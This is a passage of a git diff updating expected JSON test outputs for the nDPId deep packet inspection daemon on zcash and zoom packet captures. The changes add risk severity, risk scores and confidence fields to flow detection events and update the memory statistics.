+00918{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":145,"flow_first_seen":1514196094240,"flow_last_seen":1514197248783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":11022,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1514197248783,"l3_proto":"ip4","src_ip":"192.168.2.92","dst_ip":"178.32.196.217","src_port":55190,"dst_port":9050,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":145,"source":"zcash.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 145/145
@@ -14,10 +14,10 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4609290 bytes
-~~ total memory freed........: 4609290 bytes
-~~ total allocations/frees...: 99701/99701
+~~ total memory allocated....: 4694243 bytes
+~~ total memory freed........: 4694243 bytes
+~~ total allocations/frees...: 101291/101291
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 159 chars
-~~ json string max len.......: 733 chars
-~~ json string avg len.......: 501 chars
+~~ json string max len.......: 923 chars
+~~ json string avg len.......: 584 chars
diff --git a/test/results/zoom.pcap.out b/test/results/zoom.pcap.out
index 378571104..15e096057 100644
--- a/test/results/zoom.pcap.out
+++ b/test/results/zoom.pcap.out
@@ -1,16 +1,16 @@
 00436{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"zoom.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00728{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569520466080,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"ts_msec":1569520466080,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjbcQAAAQEICiWcznNwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="}
-00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7":"Obsolete TLS version (older than 1.2)"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.googletagmanager.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
+01028{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466080,"flow_last_seen":1569520466080,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"ts_msec":1569520466080,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"172.217.21.72","src_port":54854,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.googletagmanager.com","ja3":"d78489b860c8bf7838a6ff0b4d131541","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569520466209,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"ts_msec":1569520466209,"pkt":"AQBeAAD7KDc3AG3ICABFAABJ4i8AAAERNFzAqAF14AAA+xTpFOkANQtaAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"}
-00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}}
+00675{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"zoom.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466209,"flow_last_seen":1569520466209,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1569520466209,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520466316,"flow_last_seen":1569520466316,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1569520466316,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569520466316,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1569520466316,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+ZLAqAF1p2PXpNZPEVI+PYNCAAAAALAC\/\/9XugAAAgQFtAEDAwUBAQgKJZzPXwAAAAAEAgAA"}
 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1569520466355,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADUGBJenY9ekwKgBdRFS1k9+iDZRPj2DQ6AScSDtKQAAAgQFrAQCCArh63OkJZzPXwEDAwc="}
 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1569520466355,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+Z7AqAF1p2PXpNZPEVI+PYNDfog2UoAQECx8vAAAAQEICiWcz4Xh63Ok"}
-00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
+01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520466316,"flow_last_seen":1569520466355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1569520466355,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01126{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"zoom.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520466316,"flow_last_seen":1569520466392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":659,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1569520466392,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"167.99.215.164","src_port":54863,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"a795593605a13211941d44505b4d1e39","ja3s":"dd4b012f7a008e741554bd0a4ed12920","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
 00362{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1569520467785,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 00165{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":16,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969}
 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520467811,"flow_last_seen":1569520467811,"flow_idle_time":7440000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":1,"ts_msec":1569520467811,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"62.149.152.153","src_port":54341,"dst_port":993,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -18,48 +18,48 @@
 00729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"zoom.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569520468207,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":265,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":265,"pkt_l4_len":231,"ts_msec":1569520468207,"pkt":"EBMx8Tl2KDc3AG3ICABFAAD7AABAAEAGtb7AqAF1rNkVSNZGAbt9MLg2pduNV4AYEAjTKAAAAQEICiWc1rxwmChtFgMBAMIBAAC+AwE5BEH329R9hgOe6JDNh5Do5\/IyBg\/qLeMPj9mOGNz+swAAEgAvADMANQA5wAnACsATwBRWAAEAAIP\/AQABAAAAAB0AGwAAGHd3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbQAXAAAABQAFAQAAAAAzdAAAABIAAAAQADAALgJoMgVoMi0xNgVoMi0xNQVoMi0xNAhzcGR5LzMuMQZzcGR5LzMIaHR0cC8xLjEACwACAQAACgAKAAgAHQAXABgAGQ=="}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00598{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1569520468207,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"ts_msec":1569520468207,"pkt":"AQBef\/\/6KDc3AG3ICABFAACaDxkAAAER+CLAqAF17\/\/\/+t7BB2wAhjkTTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"}
-00609{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"zoom.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468207,"flow_last_seen":1569520468207,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1569520468207,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"239.255.255.250","src_port":57025,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1569520468399,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1569520468399,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1569520468399,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABgjegAAEARZ+DAqAF1wKgB\/wCJAIkATBmVRZdAEAABAAAAAAABIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEAAAOEAAbgAMCoAXU="}
-00603{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1569520468399,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468399,"flow_last_seen":1569520468399,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1569520468399,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1569520468399,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1569520468399,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABgqi0AAEARS5vAqAF1wKgB\/wCJAIkATJqXRZhAEAABAAAAAAABIEVNRkZFREVCRkRDTkVKRU5FQkVEQ0FDQUNBQ0FDQUFBAAAgAAHADAAgAAEAAAOEAAZgAMCoAXU="}
 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"zoom.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1569520468399,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"ts_msec":1569520468399,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAABgHVYAAEAR2HLAqAF1wKgB\/wCJAIkATJqURZlAEAABAAAAAAABIEVNRkZFREVCRkRDTkVKRU5FQkVEQ0FDQUNBQ0FDQUNBAAAgAAHADAAgAAEAAAOEAAZgAMCoAXU="}
 00567{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468922,"flow_last_seen":1569520468922,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1569520468922,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569520468922,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1569520468922,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA59vgAAP8RQPTAqAF1wKgBAftgADUAJTi0e18BAAABAAAAAAAAA2xvZwR6b29tAnVzAAABAAE="}
-00729{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468922,"flow_last_seen":1569520468922,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1569520468922,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520468922,"flow_last_seen":1569520468922,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1569520468922,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569520468958,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"ts_msec":1569520468958,"pkt":"KDc3AG3IEBMx8Tl2CABFAABJ++kAADcRA\/TAqAEBwKgBdQA1+2AANbDee1+BgAABAAEAAAAAA2xvZwR6b29tAnVzAAABAAHADAABAAEAAAA8AAQ0yj7u"}
-00743{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"zoom.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520468922,"flow_last_seen":1569520468958,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1569520468958,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":64352,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"log.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.202.62.238"}}
